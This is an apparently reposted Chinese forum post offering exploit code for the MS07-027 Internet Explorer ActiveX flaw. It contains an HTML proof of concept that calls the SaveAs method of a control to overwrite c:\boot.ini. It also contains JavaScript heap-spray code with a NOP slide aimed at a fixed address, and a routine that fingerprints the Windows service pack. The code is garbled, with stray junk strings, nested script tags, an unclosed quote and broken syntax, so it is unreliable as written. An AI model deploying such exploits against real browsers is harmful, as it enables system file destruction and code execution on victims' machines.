完整的MS07-027

CODE:

<html>

<title> MS07-027 mdsauth.dll NMSA Session Description Object SaveAs control, arbitrary file modification </title>

<body>

<OBJECT id="target" classid="clsid:d4fe6227-1288-11d0-9097-00aa004254a0">

</OBJECT>

<script language="vbscript">

//next script is converted to UTF16

target.SessionDescription="MS07-027 mdsauth.dll Proof of Concept exploit"

target.SessionAuthor="Andres Tarasco Acuna"

target.SessionEmailContact="atarasco_at_gmail.com"

target.SessionURL="http://XXXXXXXXXXXXX

target.SaveAs "c:\boot.ini"

target.SaveAs "c:\boot.ini"

<script src="inject.js"></script>

</script> [1]%G'J

</body>

</html>

以下是部分shellcode

===========///ms07-027 exploit ///================

function PrepMem()

//Standard Heap Spray Code +e

?bmE 

var heapSprayToAddress = 0x06060606;

3RC!Cv5hU 

    var payLoadCode = HeapRepairCode + Shellcode;

    var heapBlockSize = 0x400000;

    var payLoadSize = payLoadCode.length * 2;

    var spraySlideSize = heapBlockSize - (payLoadSize+0x38);

    var spraySlide = unescape("%u9090%u9090");

    spraySlide = getSpraySlide(spraySlide,spraySlideSize);

    heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;

    memory = new Array();

    for (i=0;i<heapBlocks;i++)

    {

        memory = spraySlide + payLoadCode;

    }

    function getSpraySlide(spraySlide, spraySlideSize)

    {

        while (spraySlide.length*2<spraySlideSize)

        {

            spraySlide += spraySlide;

        }

        spraySlide = spraySlide.substring(0,spraySlideSize/2);

        return spraySlide;

    }

}

function GetSystemVersion()

{

//Simple Detecting of OS version out of Jscript version:

        var ver = "";

        ver += ScriptEngineMajorVersion();

        ver += ScriptEngineMinorVersion();

        ver += ScriptEngineBuildVersion();

        if    ( ver<568820 ){ return("preSP2");

        else if ( ver<575730 ){ return("SP2");

        else return (0);

}